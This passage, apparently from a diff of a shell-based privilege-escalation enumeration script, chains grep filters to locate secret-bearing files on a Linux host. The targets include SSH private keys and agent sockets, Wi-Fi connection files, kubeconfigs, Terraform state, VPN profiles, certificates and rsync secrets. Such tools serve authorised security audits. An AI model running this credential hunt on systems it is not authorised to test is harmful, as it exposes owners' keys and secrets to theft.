"$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_RPCD=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/init.d/|/sbin/|/usr/share/' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "rpcd$" | sort | uniq | head -n 70) + PSTORAGE_BITCOIN=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "bitcoin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_WIFI_CONNECTIONS=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "system-connections$|wpa_supplicant$" | sort | uniq | head -n 70) + PSTORAGE_PAM_AUTH=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "pam\.d$" | sort | uniq | head -n 70) + PSTORAGE_NFS_EXPORTS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "exports$" | sort | uniq | head -n 70) + PSTORAGE_GLUSTERFS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "glusterfs\.pem$|glusterfs\.ca$|glusterfs\.key$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_TERRAFORM=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.tfstate$|.*\.tf$|credentials\.tfrc\.json$" | sort | uniq | head -n 70) + PSTORAGE_RACOON=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) + PSTORAGE_KUBERNETES=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "kubeconfig$|bootstrap-kubeconfig$|kubelet-kubeconfig$|kubelet\.conf$|psk\.txt$|\.kube.*$|kubelet$|kube-proxy$|kubernetes$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/mime/' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_LOG4SHELL=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}private|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv" | grep -E "log4j-core.*\.jar$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$|.*\.pub$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib.*' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib/.*|^/usr/share/|/usr/local/lib/|/usr/lib/.*' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib/.*' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '.dll' | grep -E "^${ROOT_FOLDER}run|^${ROOT_FOLDER}tmp" | grep -E "agent\..*$|ssh-agent\.sock$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^$GREPHOMESEARCH|^${ROOT_FOLDER}usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_SNYK=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "snyk\.json$|snyk\.config\.json$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e 